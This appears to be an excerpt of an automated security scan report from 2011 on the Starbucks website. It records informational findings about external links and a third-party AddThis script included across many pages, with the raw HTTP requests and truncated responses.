Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /search?keywords= HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:41 GMT
Connection: close
Content-Length: 33559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords=" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

6. Cross-domain script include
There are 300 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.starbucks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:09:57 GMT
Connection: close
Content-Length: 41029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.2. http://www.starbucks.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 38374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.3. http://www.starbucks.com/about-us/company-information

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:52 GMT
Connection: close
Content-Length: 39059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.4. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/privacy-statement HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:11 GMT
Connection: close
Content-Length: 52740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.5. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.6. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/online-policies/web-accessibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:55 GMT
Connection: close
Content-Length: 39158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.7. http://www.starbucks.com/about-us/company-information/product-advisories

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/company-information/product-advisories HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:53 GMT
Connection: close
Content-Length: 38316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.8. http://www.starbucks.com/about-us/our-heritage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/our-heritage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:47 GMT
Connection: close
Content-Length: 37409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.9. http://www.starbucks.com/business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:23 GMT
Connection: close
Content-Length: 36412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.10. http://www.starbucks.com/business/foodservice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/foodservice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:47 GMT
Connection: close
Content-Length: 35575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.11. http://www.starbucks.com/business/international-stores

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/international-stores HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:37 GMT
Connection: close
Content-Length: 36017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.12. http://www.starbucks.com/business/licensed-stores

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/licensed-stores HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:52 GMT
Connection: close
Content-Length: 35456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.13. http://www.starbucks.com/business/office-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/office-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:28 GMT
Connection: close
Content-Length: 37439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.14. http://www.starbucks.com/career-center

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /career-center HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
